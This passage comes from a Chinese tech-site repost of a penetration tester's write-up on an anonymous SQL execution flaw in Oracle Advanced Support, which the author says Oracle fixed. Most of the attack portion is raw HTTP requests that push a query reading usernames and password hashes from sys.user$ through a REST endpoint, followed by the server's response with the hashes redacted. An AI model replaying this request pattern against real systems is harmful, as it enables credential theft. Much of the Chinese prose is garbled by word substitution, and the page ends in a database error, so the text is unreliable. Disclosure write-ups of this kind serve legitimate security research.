作家
登录

Oracle Advanced Support系统SQL注入漏洞挖掘经验分享

作者: 来源: 2017-09-08 08:56:34 阅读 我要评论

  • [{"USER":"SYSMAN"}] 
  • 看起来我们是SYSMAN 用户。经由过程这个oracal 文档(https://docs.oracle.com/cd/B16351_01/doc/server.102/b14196/users_secure001.htm) 知道,我们就是administrator.

    试一下 我们可否抓掏出用户的哈希.

    1. HTTP Request: 
    2. POST /rest/data/sql HTTP/1.1 
    3. Host: host 
    4. Connection: close 
    5. Accept: */* 
    6. Accept-Encoding: gzip, deflate, sdch 
    7. Accept-Language: en-US,en;q=0.8 
    8. Content-Length: 120 
    9. Content-Type: application/json;charset=UTF-8 
    10.     "name": "test3", 
    11.     "sql":"SELECT name, password FROM sys.user$", 
    12.     "dataSourceJNDI":"jdbc/portal" 
    13. HTTP Request: 
    14. GET /rest/data/sql/test3 HTTP/1.1 
    15. Host: host 
    16. Connection: close 
    17. Accept: application/json;charset=UTF-8 
    18. Accept-Encoding: gzip, deflate, sdch 
    19. Accept-Language: en-US,en;q=0.8 
    20. Content-Type: application/json;charset=UTF-8 
    21. Content-Length: 0 
    22. HTTP Response: 
    23. HTTP/1.1 200 OK  
    24. Content-Type: application/json; charset=UTF-8 
    25. Content-Length: 5357 
    26. Connection: close 
    27. [{"NAME":"SYS","PASSWORD":"[REDACTED]"},{"NAME":"PUBLIC","PASSWORD":null},{"NAME":"CONNECT","PASSWORD":null},{"NAME":"RESOURCE","PASSWORD":null},{"NAME":"DBA","PASSWORD":null},{"NAME":"SYSTEM","PASSWORD":"[REDACTED]"},{"NAME":"SELECT_CATALOG_ROLE","PASSWORD":null},{"NAME":"EXECUTE_CATALOG_ROLE","PASSWORD":null} 
    28. … 

    我们可以获得数据库中的用户暗码的哈希值。我编辑和删除了重要的部分。知道了我们是一个具有administrator权限的用户,当然后续我们还可以做很多工作。然而,针对此博客的目标,我停止下来了。

    结论

    关于这个匿名sql履行我接洽了oracle,他们很快的答复并且修复了这个问题。对我而言真正的问题是为什么web办事压根儿就许可sql语句被履行呢?

    这个博客最大年夜的收成是必定要看竽暌功用中的javascript文件。在多个web应用和外网的渗入渗出测试中,我已经发清楚明了隐蔽在javascript文件中sql 注入,敕令履行,和 xml实体注入进击。

    作为针对闇练渗入渗出测试者的演习义务,看完这篇博客并且统计若干个你能肯定的马脚。提示:跨越三处。

    【编辑推荐】

    1. 若何确认Google用户的具体电子邮件地址(已提交Google马脚嘉奖筹划)
    2. 微软Word马脚:黑客可应用链接主动更新安装恶意软件
    3. 烽火18台系列之十五: 工控资产普查与马脚安然检测
    4. 应对安然马脚:若何将LFI变为RFI
    5. 应用PowerShell代码注入马脚绕过受限说话模式
    【义务编辑:赵宁宁 TEL:(010)68476606】

      推荐阅读

      解读大数据行业在2017年的新发展

    跟着科技的进步,大年夜数据大年夜科学前沿逐渐深刻到各行业。2017年中国的大年夜数据行业有什么新动态?大年夜数据行颐魅整体市场范围若何?大年夜数据行业前景若何?若何助力企业成长?今日的比格数据,我们来一路解读>>>详细阅读


    本文标题:Oracle Advanced Support系统SQL注入漏洞挖掘经验分享

    地址:http://www.17bianji.com/lsqh/37236.html

    关键词: 探索发现

    乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

    网友点评
    自媒体专栏

    评论

    热度

    精彩导读
    栏目ID=71的表不存在(操作类型=0)